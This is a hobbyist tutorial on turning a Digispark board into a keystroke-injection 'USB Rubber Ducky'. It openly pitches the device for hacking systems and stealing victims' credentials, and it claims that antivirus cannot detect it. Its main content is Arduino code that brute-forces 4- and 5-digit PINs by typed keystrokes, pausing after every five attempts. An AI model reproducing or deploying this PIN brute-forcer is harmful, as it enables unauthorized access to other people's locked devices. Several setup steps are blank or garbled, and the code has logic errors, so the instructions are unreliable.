USB RUBBER DUCKY
USB Rubber ducky is a HID (Human Interface Devices) device that looks similar to a USB Pen drive. It may be used to inject keystroke into a system, used to hack a system, steal victims essential and credential data can inject payload to the victim’s mobile phone. The main important thing about USB Rubber ducky is that it cannot be detected by any Anti-Virus or Firewall as it acts as an HID device.
HUMAN INTERFACE DEVICE (HID)
The Human Interface Device Class (HID) is mainly used for devices that allow human control over a PC. Using these devices, the host is able to react on human input (e.g. movements of a mouse or keypresses). The HID standard was adopted primarily to enable innovation in PC input devices and to simplify the process of installing such devices. Prior to the introduction of the HID concept, devices usually conformed to strictly defined protocols for mouse, keyboards and joysticks; for example, the standard mouse protocol at the time supported relative X- and Y-axis data and binary input for up to two buttons, with no legacy support.
How does it works?
• First, we need to download a driver so that our system can recognise this board. Click on this link :
github.com/digistump/digistumparduino/releases and download : Digistump.Drivers.zip
• After downloading, extract it then install according to your system.
• Then download Arduino from Google, after downloading then start the system.
STEPS HOW TO RUN ARDUINO
STEP 1. Open Arduino. Then click on files and select preferences.
STEP 2. How to copy the link?
STEP 3. Go to Tools, select Board “Digispark” and then Board Manager.
STEP 4.
STEP 5. Go to Tools, select Board : “Digispark (Default – 16.5mhz)” then Digistump AVR Boards.
STEP 6. Select Digispark (Default – 16.5mhz)
SET-UP CODE
#include "DigiKeyboard.h"
int num[] = {39, 30, 31, 32, 33, 34, 35, 36, 37, 38};
int a = 0; //1st digit
int b = 0; //2nd digit
int c = 0; //3rd digit
int d = 0; //4th digit
int e = 0; //5th digit
int count = 0;
bool key_stroke_e = false;
void setup() {
DigiKeyboard.update();
DigiKeyboard.sendKeyStroke(0); //this is generally not necessary but with some older systems it seems to prevent missing the first character after a delay
delay(3000);
}
void loop() {
//After 5 attempts, initialize 31000 ms wait to retry.
if(count == 5){
digitalWrite(0,HIGH); //Change this to 0 if using DigiSpark model B
DigiKeyboard.sendKeyStroke(40); //we hit enter to make the popup go away
delay(31000);
count = 0;
digitalWrite(1,LOW);
}
/*Sends keystrokes based upon the values between 0-9
It will start bruting 5 digits if a exceeds 10*/
if (key_stroke_e == false)
DigiKeyboard.sendKeyStroke(num[a]);
DigiKeyboard.sendKeyStroke(num[b]);
DigiKeyboard.sendKeyStroke(num[c]);
DigiKeyboard.sendKeyStroke(num[d]);
//check for whether it is true. If so, use 5 digits instead.
if (key_stroke_e == true){
DigiKeyboard.sendKeyStroke(num[a]);
DigiKeyboard.sendKeyStroke(num[b]);
DigiKeyboard.sendKeyStroke(num[c]);
DigiKeyboard.sendKeyStroke(num[d]);
DigiKeyboard.sendKeyStroke(num[e]);
}
DigiKeyboard.sendKeyStroke(40);
delay(1000);
d++;
count++;
//If the 4th digit is past 9, it cycles back to 0 and increments the 3rd digit
if(d == 10){
d = 0;
c++;
//If the 3rd digit is past 9, it cycles back to 0 and increments the 2nd digit
if(c == 10){
c = 0;
b++;
//If the 2nd digit is past 9, it cycles back to 0 and increments the 1st digit
if(b == 10){
b = 0;
a++; //if the 1st digit is past 9 it'll probably just throw out errors.
if(a == 10){
//remain_true will equal true, loop through void(), and send the 5th keystroke
key_stroke_e = true;
e++;
//Remember that brute forcing will still work, despite its strange order.
//After e == 10, it will become 0 again.
if(e == 10){
e = 0;
}
}
}
}
}
}
. Now go to Arduino Software and click on “tick” option on the top left corner to verify.
. Click on the “arrow” on the top left corner beside “tick” option to upload the code and at the left corner bottom a pop-up message will be shown. Within 60secs plugin the DIGISPARK BOARD in the CPU.
. After a few moment it will be uploaded successfully.
